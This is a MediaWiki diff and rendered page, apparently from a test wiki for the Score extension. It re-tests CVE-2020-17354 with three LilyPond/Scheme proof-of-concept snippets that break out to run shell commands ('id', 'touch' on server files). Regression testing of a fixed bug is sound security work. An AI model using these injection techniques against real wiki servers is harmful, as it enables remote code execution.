Tim paste: Difference between revisions

From ZMOG test wiki (master branch)
No edit summary
 
(3 intermediate revisions by the same user not shown)
Line 53: Line 53:
C,  D, E, F,|G, A, B, C|D E F G|A B c d|
C,  D, E, F,|G, A, B, C|D E F G|A B c d|
e f g a|b c' d' e'|f' g' a' b'|]
e f g a|b c' d' e'|f' g' a' b'|]
</score>
== CVE-2020-17354 ==
See [https://phabricator.wikimedia.org/T259210 T259210]; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.
1. PoC from task:<score>
{
  \relative { c' }
}
#(begin
  (define location 1)
  (display "With output-def-scope\n")
  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
  (display "With output-def-lookup\n")
  ((ly:output-def-lookup #{ \midi {} #} 'system) "touch /var/www/mediawiki-test/images/lilypond/test-1")
)
</score>
2. Again, using raw=1:<score raw=1>
\header { tagline = ##f } {
  \relative { c' }
}
#(begin
  (define location 1)
  (display "With output-def-scope\n")
  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
  (display "With output-def-lookup\n")
  ((ly:output-def-lookup #{ \midi {} #} 'system) "touch /var/www/mediawiki-test/images/lilypond/test-2")
)
</score>
3. Notehead stencil hack PoC, contributed in [https://phabricator.wikimedia.org/T259210#6368852 comment] from LilyPond developer Han-wen Nienhuys: <score>
{
  \override NoteHead.text = \system
  \override NoteHead.stencil =
  #(lambda (grob)
    ((cdr (assoc 'text
  (cadr (ly:grob-alist-chain grob '())))) "touch /var/www/mediawiki-test/images/lilypond/test-3")
    #f)
  c4
}
</score>
</score>

Latest revision as of 11:15, 21 January 2023

Normal

Unable to obtain LilyPond version:

/bin/bash: line 1: /usr/local/bin/lilypond: No such file or directory

Multipage

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Raw

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Starling

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Rest

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

ABC

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

CVE-2020-17354

See T259210; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.

1. PoC from task:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

2. Again, using raw=1:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

3. Notehead stencil hack PoC, contributed in comment from LilyPond developer Han-wen Nienhuys:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.